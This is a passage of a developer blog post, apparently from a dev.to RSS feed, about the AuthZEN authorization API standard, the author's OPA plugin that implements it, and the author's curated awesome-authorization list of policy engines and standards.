&lt;p&gt;OPA wants &lt;code&gt;{"input": {...}}&lt;/code&gt; sent via &lt;code&gt;POST /v1/data/...&lt;/code&gt;. Cedar uses a different API entirely. SpiceDB expects a gRPC &lt;code&gt;CheckPermission&lt;/code&gt; call. They are all different.&lt;/p&gt;

&lt;p&gt;This means if you ever decide to swap engines, you have to rewrite all of your application code. We successfully separated PDP (decision) from PEP (enforcement), but we never standardized the protocol between them.&lt;/p&gt;
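&lt;p&gt;The same question, phrased for two of these engines, shows the divergence (the shapes follow OPA's Data API and the AuthZEN evaluation request; the OPA policy path &lt;code&gt;app/authz/allow&lt;/code&gt; is a made-up example):&lt;/p&gt;

```python
# "Can alice read doc-123?" -- one question, two wire formats.

# OPA's Data API: POST /v1/data/app/authz/allow
opa_request = {
    "input": {"user": "alice", "action": "read", "resource": "doc-123"},
}

# AuthZEN: POST /access/v1/evaluation
authzen_request = {
    "subject": {"type": "user", "id": "alice"},
    "action": {"name": "read"},
    "resource": {"type": "document", "id": "doc-123"},
}
```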

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk2v9117oytfvcnlaswhe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fk2v9117oytfvcnlaswhe.png" alt="AuthZEN" width="800" height="200"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In January 2026, the OpenID Foundation officially approved the &lt;strong&gt;AuthZEN Authorization API 1.0&lt;/strong&gt; as a Final Specification. It standardizes the communication between the PEP and PDP, allowing you to use the exact same JSON API regardless of which underlying engine is running.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Request:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Can&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;subject&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;perform&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;action&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;on&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;this&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;resource?&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="err"&gt;POST&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;/access/v&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="err"&gt;/evaluation&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"subject"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"user"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"alice"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"read"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"resource"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"type"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"document"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nl"&gt;"id"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"doc-123"&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;Response&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"decision"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Why does this matter? It decouples your engine choice from your application code. Starting with OPA and later swapping it out for Cedar as your use case evolves is suddenly a realistic option.&lt;/p&gt;

&lt;h3&gt;
  
  
  Making OPA AuthZEN-Compatible
&lt;/h3&gt;

&lt;p&gt;I built a plugin that makes OPA natively speak AuthZEN.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/kanywst/opa-authzen-plugin" rel="noopener noreferrer"&gt;opa-authzen-plugin&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;OPA is a generic policy engine with its own REST API. Its paths, request structures, and response structures are entirely different from AuthZEN's. There was an &lt;code&gt;authzen-proxy&lt;/code&gt; built in Node.js sitting in the contrib repo, but running a separate proxy process alongside OPA felt less than ideal for production.&lt;/p&gt;

&lt;p&gt;So, I used OPA’s plugin architecture to run an AuthZEN server directly inside the OPA process itself. It’s the exact same pattern used by the &lt;code&gt;opa-envoy-plugin&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figfolhndl5567939rbj0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figfolhndl5567939rbj0.png" alt="opa-authzen-plugin" width="800" height="166"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Engines like Cerbos and Topaz have already started natively supporting AuthZEN. As more engines adopt it, the switching costs between them will continue to drop.&lt;/p&gt;




&lt;h2&gt;
  
  
  5. Why the Existing awesome-authorization Failed
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/warrant-dev/awesome-authorization" rel="noopener noreferrer"&gt;warrant-dev/awesome-authorization&lt;/a&gt; has around 420 stars and decent visibility. But looking closely at the content, there are obvious gaps.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It focuses heavily on articles and concepts, lacking actual tools.&lt;/strong&gt; OPA gets exactly one line. Major engines like Cedar, OpenFGA, SpiceDB, Casbin, and Cerbos are entirely absent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It completely ignores modern standards.&lt;/strong&gt; The authorization spec world doesn’t end with OAuth 2.0. We have AuthZEN, SPIFFE, UMA, and GNAP reshaping the space, but none of them are covered.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It feels like a vendor proxy.&lt;/strong&gt; The repo puts the Warrant company banner right at the very top. It’s hard to call it a vendor-neutral community resource.&lt;/p&gt;

&lt;p&gt;So, I decided to build a better one.&lt;/p&gt;




&lt;h2&gt;
  
  
  6. Curating awesome-authorization
&lt;/h2&gt;

&lt;p&gt;I designed &lt;a href="https://github.com/kanywst/awesome-authorization" rel="noopener noreferrer"&gt;kanywst/awesome-authorization&lt;/a&gt; to cover the entire authorization landscape through the following sections:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi9es7j4hn1tywyha851i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi9es7j4hn1tywyha851i.png" alt="awesome-authorization" width="800" height="85"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The biggest differentiator from the old list is the &lt;strong&gt;Policy Engines section&lt;/strong&gt;. I explicitly categorized them into General Purpose, Zanzibar-based, Kubernetes Native, and AuthZEN-compatible. I wanted to create a place where anyone looking for an auth engine could instantly understand the entire current market.&lt;/p&gt;

&lt;p&gt;The Standards section is just as comprehensive, covering AuthZEN, OAuth/OIDC, SPIFFE/SPIRE, XACML, and GNAP. You can't grasp the "big picture" of authorization by just looking at tools—you need to understand the underlying specifications driving them.&lt;/p&gt;




&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;There are too many authorization engines, and no place to make sense of them all. So I fixed that.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/kanywst/awesome-authorization" rel="noopener noreferrer"&gt;kanywst/awesome-authorization&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Whether you are trying to select a policy engine, research a standard specification, or find that one specific engineering blog post you read months ago, treat this repository as your starting point.&lt;/p&gt;

&lt;p&gt;PRs are absolutely welcome. If a good tool or article is missing, please add it.&lt;/p&gt;




&lt;h2&gt;
  
  
  Related Articles
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/authzen-authorization-api-10-deep-dive-the-standard-api-that-separates-authorization-decisions-1m2a"&gt;AuthZEN Authorization API 1.0 Deep Dive&lt;/a&gt; : Deep Dive into the AuthZEN Spec&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/i-built-an-opa-plugin-that-turns-it-into-an-authzen-compatible-pdp-eac"&gt;I Built an OPA Plugin That Turns It Into an AuthZEN-Compatible PDP&lt;/a&gt; : Design and Implementation of opa-authzen-plugin&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/google-zanzibar-deep-dive-handling-2-trillion-acls-in-under-10ms-456d"&gt;Google Zanzibar Deep Dive&lt;/a&gt; : Explaining the Zanzibar Paper&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://dev.to/kanywst/rbac-vs-abac-vs-rebac-how-to-choose-and-implement-access-control-models-3c89"&gt;RBAC vs ABAC vs ReBAC&lt;/a&gt; : Comparing Access Control Models&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>authorization</category>
      <category>security</category>
      <category>opensource</category>
      <category>showdev</category>
    </item>
  </channel>
</rss>
